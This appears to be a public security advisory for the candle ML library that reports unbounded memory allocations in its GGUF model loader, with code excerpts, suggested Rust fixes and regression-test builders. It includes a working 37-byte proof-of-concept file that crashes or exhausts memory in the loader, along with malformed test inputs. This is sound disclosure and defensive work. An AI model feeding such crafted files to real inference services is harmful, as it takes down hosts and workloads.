Filing this publicly because the repo does not currently have Private Vulnerability Reporting enabled. Happy to move to a private channel if preferred — please enable PVR on the repo and let me know.
Summary
candle-core/src/quantized/gguf_file.rs (current main, commit 24b0b28+) reads several length and count fields from a GGUF file as u32/u64 and uses them directly as the size argument of vec![T; n], Vec::with_capacity(n), and for _ in 0..n loops, with no upper-bound check. A small (< 64-byte) GGUF file that declares 2^32 items drives the loader into multi-GB allocation requests or extremely long iteration. A failed allocation aborts the process (Rust's default behaviour), and a successful one can exhaust host memory, so either the host or its inference workload goes down.
Same bug class as CVE-2025-66960 (ollama fs/ggml/gguf.go, fixed). In candle, the same pattern recurs across five sites. The sibling crate safetensors in the same org explicitly caps with MAX_HEADER_SIZE + buffer.get slicing — candle's GGUF loader did not adopt that pattern.
Affected sites
All in candle-core/src/quantized/gguf_file.rs:
(a) L99 — read_string length buffer:
```rust
let len = match magic {
    VersionedMagic::GgufV1 => reader.read_u32::<LittleEndian>()? as usize,
    VersionedMagic::GgufV2 | VersionedMagic::GgufV3 => {
        reader.read_u64::<LittleEndian>()? as usize
    }
};
let mut v = vec![0u8; len]; // <-- requests `len` bytes before any of them are read
reader.read_exact(&mut v)?;
```
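vec![0u8; len] asks the allocator for all `len` bytes before a single byte of the string has been read or validated, so len = 2^32 is a 4 GB allocation request. Whether that memory is committed immediately or only reserved depends on the OS and allocator; if the request cannot be satisfied, Rust's default allocation-error handling aborts the whole process instead of returning Err.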
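A complementary mitigation is to stop trusting the length for allocation at all and let the buffer grow only as bytes actually arrive. The sketch below uses only std; read_string_take is a hypothetical name, not candle API, and it assumes the caller has already decoded the length field as a u64. Read::take bounds the read to `len` bytes and read_to_end grows the buffer incrementally, so a truncated 37-byte file costs only the bytes it really contains. An explicit length cap is still worth keeping on top of this.

```rust
use std::io::{self, Read};

/// Sketch: read a length-prefixed GGUF string without pre-allocating `len` bytes.
/// `len` is the raw length field already decoded from the file (hypothetical helper).
fn read_string_take<R: Read>(reader: &mut R, len: u64) -> io::Result<String> {
    let mut buf = Vec::new();
    // `take` stops after `len` bytes; `read_to_end` grows `buf` as data arrives,
    // so memory use tracks the bytes actually present, not the declared length.
    let n = reader.by_ref().take(len).read_to_end(&mut buf)?;
    if (n as u64) < len {
        return Err(io::Error::new(
            io::ErrorKind::UnexpectedEof,
            format!("string declared {len} bytes but only {n} were present"),
        ));
    }
    String::from_utf8(buf).map_err(|e| io::Error::new(io::ErrorKind::InvalidData, e))
}
```

Because `by_ref()` is used, the underlying reader is left positioned right after the string, ready for the next field.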
(b) L306 — Value::read ARRAY branch:
```rust
let len = match magic { ... };
let mut vs = Vec::with_capacity(len);
for _ in 0..len {
    vs.push(Value::read(reader, value_type, magic)?)
}
```
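A cap alone does not fully fix this site: with the suggested GGUF_MAX_ARRAY_ELEMENTS = 1 << 30, Vec::with_capacity(len) can still reserve 1 << 30 × size_of::<Value>() bytes up front. A minimal sketch that caps the declared length and also treats it only as a capacity hint; u32 elements stand in for candle's `Value`, and both constants and the function name are hypothetical.

```rust
use std::io::{self, Read};

/// Hypothetical cap on the declared element count (mirrors the suggested fix).
const GGUF_MAX_ARRAY_ELEMENTS: u64 = 1 << 30;
/// Hypothetical bound on what is reserved before any element has been decoded.
const MAX_PREALLOC_ELEMENTS: usize = 4096;

/// Sketch of the ARRAY branch, with u32 elements standing in for `Value`.
fn read_u32_array<R: Read>(reader: &mut R, len: u64) -> io::Result<Vec<u32>> {
    if len > GGUF_MAX_ARRAY_ELEMENTS {
        return Err(io::Error::new(
            io::ErrorKind::InvalidData,
            format!("GGUF array length {len} exceeds max {GGUF_MAX_ARRAY_ELEMENTS}"),
        ));
    }
    // len <= 2^30 fits in usize on both 32- and 64-bit targets.
    let len = len as usize;
    // Reserve at most MAX_PREALLOC_ELEMENTS; push() grows the Vec as elements are decoded.
    let mut vs = Vec::with_capacity(len.min(MAX_PREALLOC_ELEMENTS));
    for _ in 0..len {
        let mut b = [0u8; 4];
        reader.read_exact(&mut b)?; // fails with UnexpectedEof on a truncated file
        vs.push(u32::from_le_bytes(b));
    }
    Ok(vs)
}
```

With this shape, a file that declares a million elements but carries three fails at the fourth read_exact after reserving only a few KB.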
(c) L421 — tensor_count outer loop:
```rust
let tensor_count = ... reader.read_u64::<LittleEndian>()? as usize;
for _idx in 0..tensor_count {
    let tensor_name = read_string(reader, &magic)?;
    ...
}
```
(d) L413 — metadata_kv_count: Same shape as (c).
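For the two count sites, a cheap plausibility gate is to reject any count whose minimal encoding could not fit in the rest of the file. This sketch assumes the loader has a seekable reader (a file or std::io::Cursor). The minimum record sizes are derived from the GGUF v2/v3 layout (a KV is key length u64 + value type u32 + at least a 1-byte value; a tensor info is name length u64 + n_dimensions u32 + dtype u32 + offset u64). The helper names are hypothetical.

```rust
use std::io::{self, Seek, SeekFrom};

/// Smallest possible encodings in GGUF v2/v3 (empty key/name, 1-byte value, zero dims).
const MIN_KV_BYTES: u64 = 8 + 4 + 1;
const MIN_TENSOR_INFO_BYTES: u64 = 8 + 4 + 4 + 8;

/// Bytes between the current position and the end of the stream; restores the position.
fn remaining_bytes<R: Seek>(reader: &mut R) -> io::Result<u64> {
    let pos = reader.stream_position()?;
    let end = reader.seek(SeekFrom::End(0))?;
    reader.seek(SeekFrom::Start(pos))?;
    Ok(end.saturating_sub(pos))
}

/// Reject a declared record count that cannot possibly fit in the rest of the file.
fn check_count<R: Seek>(
    reader: &mut R,
    count: u64,
    min_record_bytes: u64,
    what: &str,
) -> io::Result<()> {
    let remaining = remaining_bytes(reader)?;
    // checked_mul: an adversarial count such as u64::MAX would otherwise overflow.
    match count.checked_mul(min_record_bytes) {
        Some(needed) if needed <= remaining => Ok(()),
        _ => Err(io::Error::new(
            io::ErrorKind::InvalidData,
            format!("{what} count {count} cannot fit in the {remaining} remaining bytes"),
        )),
    }
}
```

Called right after each count is read, this bounds both loops by the file size, so a 37-byte file can no longer claim 2^64 tensors.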
(e) L427 / L432 — tensor dimensions vector:
```rust
let n_dimensions = reader.read_u32::<LittleEndian>()?;
let mut dimensions = vec![0; n_dimensions as usize]; // <-- alloc
reader.read_u32_into::<LittleEndian>(&mut dimensions)?;
```
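The snippet shows the GGUF v1 path, which reads u32 dimensions (4 bytes/element). The v2/v3 path reads u64 dimensions, so 8 bytes/element: n_dimensions = 2^32 − 1 → ~32 GB allocation request before any dimension is read. The PoC below uses GGUF v3 and takes this path.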
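A minimal sketch of the v2/v3 dimension read with the count checked before anything is allocated. GGUF_MAX_TENSOR_DIMS = 8 mirrors the suggested fix (ggml's own GGML_MAX_DIMS is 4); read_dims_v3 is a hypothetical name, and the usize::try_from step is an addition for 32-bit targets.

```rust
use std::io::{self, Read};

/// Hypothetical cap, matching the suggested fix.
const GGUF_MAX_TENSOR_DIMS: u32 = 8;

/// Sketch: read n_dimensions (u32) and then that many u64 dimensions (GGUF v2/v3 layout).
fn read_dims_v3<R: Read>(reader: &mut R) -> io::Result<Vec<usize>> {
    let mut b4 = [0u8; 4];
    reader.read_exact(&mut b4)?;
    let n_dimensions = u32::from_le_bytes(b4);
    if n_dimensions > GGUF_MAX_TENSOR_DIMS {
        return Err(io::Error::new(
            io::ErrorKind::InvalidData,
            format!("GGUF tensor has {n_dimensions} dimensions, max is {GGUF_MAX_TENSOR_DIMS}"),
        ));
    }
    // At most GGUF_MAX_TENSOR_DIMS elements, so this allocation is now trivially small.
    let mut dims = Vec::with_capacity(n_dimensions as usize);
    for _ in 0..n_dimensions {
        let mut b8 = [0u8; 8];
        reader.read_exact(&mut b8)?;
        let raw = u64::from_le_bytes(b8);
        // On 32-bit targets a u64 dimension may not fit in usize.
        let d = usize::try_from(raw).map_err(|_| {
            io::Error::new(io::ErrorKind::InvalidData, format!("dimension {raw} does not fit in usize"))
        })?;
        dims.push(d);
    }
    Ok(dims)
}
```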
Reachability
gguf_file::Content::read is the canonical entry for loading any GGUF model. Any application that loads a user-supplied or hub-downloaded GGUF traverses these sites.
Minimal PoC — 37 bytes
```python
import struct

malicious = (
    b'GGUF'                           # magic
    + struct.pack('<I', 3)            # version = 3
    + struct.pack('<Q', 1)            # tensor_count = 1
    + struct.pack('<Q', 0)            # kv_count = 0
    + struct.pack('<Q', 1) + b't'     # name = 't'
    + struct.pack('<I', 0xFFFFFFFF)   # n_dimensions = 2^32 - 1
)
assert len(malicious) == 37
with open('/tmp/evil.gguf', 'wb') as f:
    f.write(malicious)
```
Then load it with candle:
```rust
use candle_core::quantized::gguf_file;
use std::fs::File;

fn main() {
    let mut f = File::open("/tmp/evil.gguf").unwrap();
    // Parsing the tensor info attempts vec![0; 2^32 - 1] with 8-byte elements (~32 GB).
    let _ = gguf_file::Content::read(&mut f);
}
```
Suggested fix
Mirror the safetensors pattern. Define caps and gate each allocation:
```rust
const GGUF_MAX_ARRAY_ELEMENTS: usize = 1 << 30;
const GGUF_MAX_STRING_LENGTH: usize = 1 << 26;
const GGUF_MAX_TENSOR_DIMS: usize = 8;

fn read_string<R: Read>(reader: &mut R, magic: &VersionedMagic) -> Result<String> {
    let len = ...;
    if len > GGUF_MAX_STRING_LENGTH {
        crate::bail!("GGUF string length {len} exceeds max {GGUF_MAX_STRING_LENGTH}");
    }
    let mut v = vec![0u8; len];
    reader.read_exact(&mut v)?;
    ...
}
```
Equivalent gates at L306, L413, L421, L427. The C++ baseline ggml/src/gguf.cpp enforces the same caps after PR ggml-org/llama.cpp#19856.
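One detail for these gates: if `len` is still produced with `as usize`, as in the current read_string, the comparison happens after narrowing. On a 32-bit target a u64 length such as 2^32 + 5 truncates to 5, passes the cap, and desynchronises the parser. A sketch of a hypothetical helper, checked_len, that compares in u64 first and only then converts with usize::try_from:

```rust
use std::io;

/// Hypothetical helper: validate a raw length field against a cap *before* narrowing to usize.
fn checked_len(raw: u64, max: u64, what: &str) -> io::Result<usize> {
    if raw > max {
        return Err(io::Error::new(
            io::ErrorKind::InvalidData,
            format!("GGUF {what} {raw} exceeds max {max}"),
        ));
    }
    // try_from rather than `as`: never silently truncates on 32-bit targets.
    usize::try_from(raw).map_err(|_| {
        io::Error::new(io::ErrorKind::InvalidData, format!("GGUF {what} {raw} does not fit in usize"))
    })
}
```

In read_string this would take the value straight from read_u64 (or read_u32 for v1, widened to u64) together with GGUF_MAX_STRING_LENGTH as u64.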
Regression tests should cover each site with an oversized value and assert that the parser returns Err (not OOM).
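For those tests, a small byte builder keeps each oversized input readable. This is a sketch: GgufBytes and oversized_cases are hypothetical test helpers, and the value-type ids (UINT8 = 0, ARRAY = 9) come from the GGUF specification's type table.

```rust
/// Hypothetical test helper (not part of candle): builds little-endian GGUF v3 byte strings.
#[derive(Default)]
struct GgufBytes(Vec<u8>);

impl GgufBytes {
    /// Magic, version = 3, tensor_count, metadata_kv_count (the fixed GGUF v3 header).
    fn header(tensor_count: u64, kv_count: u64) -> Self {
        GgufBytes::default()
            .put_raw(b"GGUF")
            .put_u32(3)
            .put_u64(tensor_count)
            .put_u64(kv_count)
    }
    fn put_raw(mut self, bytes: &[u8]) -> Self {
        self.0.extend_from_slice(bytes);
        self
    }
    fn put_u32(self, x: u32) -> Self {
        self.put_raw(&x.to_le_bytes())
    }
    fn put_u64(self, x: u64) -> Self {
        self.put_raw(&x.to_le_bytes())
    }
    /// GGUF string: u64 byte length followed by the bytes (no terminator).
    fn put_string(self, s: &str) -> Self {
        self.put_u64(s.len() as u64).put_raw(s.as_bytes())
    }
}

/// GGUF value type ids used below.
const GGUF_TYPE_UINT8: u32 = 0;
const GGUF_TYPE_ARRAY: u32 = 9;

/// One oversized input per affected site; each should make the loader return Err.
fn oversized_cases() -> Vec<(&'static str, Vec<u8>)> {
    vec![
        // (a) read_string: the first metadata key declares a 2^32-byte length.
        ("string length", GgufBytes::header(0, 1).put_u64(1 << 32).0),
        // (b) ARRAY branch: a u8 array declaring u64::MAX elements.
        (
            "array length",
            GgufBytes::header(0, 1)
                .put_string("k")
                .put_u32(GGUF_TYPE_ARRAY)
                .put_u32(GGUF_TYPE_UINT8)
                .put_u64(u64::MAX)
                .0,
        ),
        // (c) tensor_count and (d) metadata_kv_count.
        ("tensor_count", GgufBytes::header(u64::MAX, 0).0),
        ("metadata_kv_count", GgufBytes::header(0, u64::MAX).0),
        // (e) n_dimensions: byte-for-byte the 37-byte PoC.
        ("n_dimensions", GgufBytes::header(1, 0).put_string("t").put_u32(u32::MAX).0),
    ]
}
```

Each case can be wrapped in std::io::Cursor (which is Read + Seek) and passed to gguf_file::Content::read, asserting `.is_err()`. Running the suite under a memory limit (for example `ulimit -v`) makes an unbounded allocation fail loudly instead of quietly succeeding on a machine with generous overcommit.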
CWE
- CWE-770 (Allocation of Resources Without Limits or Throttling)
- CWE-1284 (Improper Validation of Specified Quantity in Input)
- CWE-400 (Uncontrolled Resource Consumption)
CVE
If a CVE assignment is in scope here, happy to coordinate.